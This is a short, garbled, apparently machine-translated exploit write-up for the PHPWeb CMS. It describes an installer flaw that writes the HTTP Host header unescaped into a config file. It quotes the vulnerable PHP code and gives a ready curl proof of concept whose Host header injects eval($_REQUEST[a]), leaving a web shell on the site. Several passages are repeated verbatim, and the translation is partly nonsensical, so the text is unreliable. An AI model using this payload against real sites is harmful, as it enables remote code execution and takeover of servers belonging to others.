phpweb完成品ウェブサイト最新版(注入、アップロード、shell)
3366 ワード
注入:タッカルビがこの脆弱性なのは、インストールファイルを使って再生成したプロファイルで実行可能コードを書き込みます.
鶏肋1:破壊的な動作が非常に大きいので、配置ファイルのデータベース接続ファイルを新たに書きました.鶏肋2:一定の安全常識がある駅長はinstallディレクトリを削除します.
あばら骨でもありますが、magicを受けないというメリットがあります.quot tesgpc、webserver影響
分析:
poc
鶏肋1:破壊的な動作が非常に大きいので、配置ファイルのデータベース接続ファイルを新たに書きました.鶏肋2:一定の安全常識がある駅長はinstallディレクトリを削除します.
あばら骨でもありますが、magicを受けないというメリットがあります.quot tesgpc、webserver影響
分析:
$siteurl="http://".$_SERVER["HTTP_HOST"]."/"; //
$filestr = fread(fopen($SysConfigFile, 'r'),30000);
$filestr=str_replace(" ","",$filestr);
$filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
$filestr=str_replace("DefaultDbName",$dbname,$filestr);
$filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
$filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
$filestr=str_replace("DefaultsLan","zh_cn",$filestr);
$filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
$filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);
fwrite(fopen($ConFile,"w"),$filestr,30000);
$uSERVER[HTTPuHOST]とは、http headのHOSTから伝達される制御可能なものであり、magic_からは受けられないものである.quot tesgpc影響^u^poc
curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"